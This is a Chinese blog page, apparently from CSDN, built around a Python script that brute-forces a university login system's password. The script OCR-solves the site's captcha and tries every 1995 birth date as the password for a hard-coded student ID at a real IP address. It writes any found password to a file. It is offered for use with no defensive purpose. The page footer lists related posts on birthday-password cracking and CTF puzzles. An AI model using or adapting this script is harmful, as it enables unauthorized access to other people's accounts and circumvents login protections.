猜生日密码

最新推荐文章于 2023-12-25 23:41:40 发布
最新推荐文章于 2023-12-25 23:41:40 发布
阅读量750 收藏
点赞数
分类专栏: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Half_open/article/details/42931665
版权 
#coding:utf-8
'''
猜生日密码
'''
__author__ = 'halfopen'

from bs4 import BeautifulSoup
from ocr.pytesser import *
from PIL import Image
import urllib2
import sys
import ImageEnhance
import urllib
import cookielib
import re


# 设置 cookie
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
headers = {"User-agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"}
url = "http://210.42.121.241/servlet/GenImg"


# 获取验证码图片,并保存到cap.jpeg里面
def get_cap():
    request = urllib2.Request( url=url,headers = headers)
    f = opener.open(request)
    with open("cap.jpeg", "wb") as code:
        code.write(f.read())


#   图片转成黑白图片
def pic_to_black(im):
    pix = im.load()     # 像素点
    x, y = im.size[0], im.size[1]
    # cap_txt = ""        # 用来保存字符
    b_im = Image.new("RGB", (x, y), (0, 0, 0))
    for j in range(y):
        for i in range(x):
            r, b, g = pix[i, j][0], pix[i, j][1], pix[i, j][2]
            if r > 120 and g < 80 and b < 80:
                # cap_txt += "1"
                pass
            else:
                # cap_txt += "0"
                b_im.putpixel((i, j), (255, 255, 255))
    enhancer = ImageEnhance.Contrast(b_im)
    b_im = enhancer.enhance(4)  # 转黑白图片
    b_im.save("b_cap.jpeg")
    # return cap_txt


# 获取验证码,保存到返回值里面
def get_cap_txt():
    cap_txt = ""
    while len(cap_txt) < 5:
        get_cap()
        im1 = Image.open('cap.jpeg')
        pic_to_black(im1)
        im2 = Image.open('b_cap.jpeg')
        cap_txt = image_to_string(im2)
    txt = ""
    l = len(cap_txt)
    txt += cap_txt[l - 6]
    txt += cap_txt[l - 5]
    txt += cap_txt[l - 4]
    txt += cap_txt[l - 3]
    return txt


def login(username, password):
    cap_txt = get_cap_txt()
    # print "Get a captcha:<"+cap_txt+">"
    post_url = "http://210.42.121.241/servlet/Login"
    params = urllib.urlencode({'id': username, 'pwd': password, 'xdvfb': cap_txt})
    request = urllib2.Request(url=post_url, headers=headers, data=params)   # 读取网页
    f = opener.open(request)        # 开始登陆
    html = f.read()
    soup = BeautifulSoup(html)
    # 抓取网页提示信息
    error = soup.find("font", {"color": "red"})     # 登录失败信息
    print error
    if error is not None:           # 如想存在错误信息
        l = len( str(error) )
        if( l == 99):
            print "wrong password"
            return 0    # 密码错误
        elif l == 92:
            print "wrong captcha"
            return -1   # 验证码错误
        else:
            return -2   # 其它错误
    else:
        print soup
        return 1

# 猜密码
def guess(username, month_s, month_e):
    for i in range(month_s, month_e):
        for j in range(1, 32):
            birth = "1995"+"%02d"%i+ "%02d"%j
            t = -1
            while(t != 0):
                t = login(username, birth)
                print "\t\t try again"
                if t == 1:
                    print "\t\t\tPassword is "+str(t)+"-------------------------- :"+birth
                    f = open(username+".txt", "w+")
                    f.write(birth)
                    exit(0)
            print "\t"+birth
        #print birth


if __name__ == '__main__':
    if len(sys.argv) > 3:
        name = sys.argv[1]
        s = int(sys.argv[2])
        e = int(sys.argv[3])
        print name, s, e
        guess(name, s, e)
    else:
        print "Usage:Python login.py username start end"
    guess('2013301500075', 1, 13)

Half0pen
关注
专栏目录
NSCTF-misc-writeup
Brucetg的博客
07-22 4639
Misc:     Kungfu   打开压缩包,里面有一张png后缀的图片,因为分比较低,感觉是套路题,直接winhex打开查看,在文件末尾发现提示:     尝试base64解码:     尝试凯撒和栅栏解密都不行,还以为是思路错误,后来队友提示后面加一个空格试试,顺利得到flag:                          
非零坊生日密码 v2.0
10-17
《非零坊生日密码 v2.0》是一个基于ASP源码的应用程序,主要涉及Web开发领域的编程技术。ASP,全称Active Server Pages,是微软推出的一种服务器端脚本环境,用于创建动态交互式网页。这个版本2.0的程序表明它在前一...
ctf模拟赛题解
m0_74924621的博客
12-25 1263
显示f14g列名:b80bb7740288fda1f201890375a60c8f,327a6c4304ad5938eaf0efb6cc3e53dc。题目提示了支持中文,就可以想到宽字节,登陆之后发现有一个显示位,可以通过联合查询得到flag。发现可控的变量,已经知道是PHP的程序,我们开始用变量构造页面,构造一个phpinfo吧。只允许上传类型中有zip类型,那么可以将一句话木马压缩成zip文件上传,用蚁剑连接。查看index.bak:发现file:///和php://被禁用。
生日密码1127
10-27 807
11月27日 触发兴奋之火 11月27日出生的人通常很会制造兴奋的场面,要不就是自己很容易便感到兴奋,也可能是两者同时兼具。他们手脚的速度很快,电流般的特质在各项行为中显露无遗。他们非常冲动,极少停下来看看是不是走错了方向。所以尽管直觉很敏锐、正确,但速度太快却经常给自己带来很多麻烦。 今天出生的人不管内心与外在,总是给别人紧张的印象,人们看到的都是他们一直持续不断的快动作。他们可以为了赶进度而使
生日密码破解-zip
qq_39536716的博客
01-05 1192
1、首先安装木头超级字典工具,进行制作一个密码字典 我们安装好以后进去根据自己的需求点击就可以了,对于生日这个我们要选择生成字典,然后选择日期字典 其余的选项根据自己的需要进行设定,生成字典以后注意记住自己保存的位置 然后通过我们的Ziperello选择我们要进行解密的压缩文件   点击next,选择字典破解或者暴力破解都可以,我这里选择字典破解  next之后选择好自己生成的...
BUUCTF密码学部分前十二题(l1ght)
B1_ye的博客
07-17 4142
1.MD5 解压压缩包之后我们将得到这样一串字符:e00cf25ad42683b3df678c61f42c6bda 将这串字符进行MD5解密,得到flag:flag{admin1} 2.url编码 得到字符:%66%6c%61%67%7b%61%6e%64%20%31%3d%31%7d 进行url解码:flag{and 1=1} 3.一眼就解密 得到字符:ZmxhZ3tUSEVfRkxBR19PRl9USElTX1NUUklOR30= 很明显,一眼就能看出这是base64,也可以由尾部的“.
突然想到了生日密码破解
糯米糊糊的专栏
05-28 1895
突然想到人生苦短,世事无常。密码的小心,真是一件很重要的事情。下面分析一下:一年有365天,也就是说,有365个生日,现在世界上活着的人的年纪从1岁到150岁(应该够长了),所以有150*365个不同生日,即54750个生日,又由于不同的表达法,比如2006年8月9日,可以是20060809,060809,200689,0689,年月日三种排列共有6种方式,年的表示有2种,月的表示有2种(带0
基于PHP的生日密码查询工具.zip
08-26
【标题】"基于PHP的生日密码查询工具"指的是一个使用PHP编程语言开发的软件应用,其主要功能可能是帮助用户通过生日日期来查找或验证特定的密码。在网络安全领域,生日常被用作密码的一部分,因为它们对个人而言具有...
[工具查询]我要查生日密码查询系统_birth.zip
最新发布
03-17
"生日密码"通常指的是使用生日日期创建的个人密码,这种密码在网络安全中并不推荐,因为它们容易被到。在这个压缩包中,"我要查生日密码查询系统"可能是一个工具,用于帮助用户理解生日密码的概念,或者可能是一个...
PHP实例开发源码— php 生日密码查询工具.zip
11-22
生日密码通常是指将用户的出生日期转换为一种密码形式,例如,如果一个人的生日是1990年1月1日,那么一个简单的生日密码可能是“19900101”。这种类型的密码有一定的安全性,因为它需要知道用户的个人信息才能出,...
蒙特 数字 公约倍 羊车门 凯撒 文本进度条 基本统计量 三国演义Halemt 8串密码 统计字符 生日悖论
07-01
可以
CTF必备密码编码大全
热门推荐
一只菜鸟的博客
11-07 1万+
通信领域的编码 1.摩斯编码 特征特点:用点(.)和划(-)来编码范围0-9、A-Z的字符,字母不区分大小写,两个字母之间的空格用斜杠(/)或者三个点(.)或者一个划(-)表示,两个单词之间的间隔是七个点(.)。 根据摩斯编码的原理,CTF中也有出现过变种的摩斯编码,比如点(.)和划(-)用数字0和1来表示等此类变种的思路。 在线解密&工具: http://www.jb51.net/tools/morse.htm (编码的时候不转换空格) http://ctf.ssleye.com/morse
python中ascii码和字符的转换
Halfopen的专栏
07-22 7860
字符转ascii码ord(str) ascii码转字符chr(num)
mcm C 数据抓取
Halfopen的专栏
01-29 7704
# coding:utf-8 import urllib2 import urllib import cookielib import sys import json import xlwt # 璁剧疆 cookie cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(c
下载acfun表情图片
Halfopen的专栏
02-24 2217
下载acfun表情图片
武汉大学大型应用软件设计 订餐系统
Halfopen的专栏
12-19 1996
https://github.com/halfopen/OlineOrderMealSystem
湖南理工学院综合信息服务系统生日
Halfopen的专栏
02-14 1914
#coding:utf-8 ''' 获取生日密码 ''' __author__ = 'halfopen' from bs4 import BeautifulSoup import urllib2 import sys import urllib import cookielib import re # 设置 cookie cj = cookielib.CookieJar() opener =
python 更新谷歌hosts
Halfopen的专栏
09-01 1258
#coding:utf-8 ''''' 下载google host 修改 系统hosts文件 ''' from requests.packages.urllib3 import request __author__ = 'halfopen' from bs4 import BeautifulSoup from PIL import Image import urllib2
常见弱密码列表与安全风险
6. **日期和生日**:如 "2000"、"2112" 和 "888888" 等,生日和重要日期常常被用作密码,不建议使用。 7. **流行文化**:如 "america"、"amigos" 和 "amateur" 等,流行歌曲、电影或体育术语也常见于弱密码。 8. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值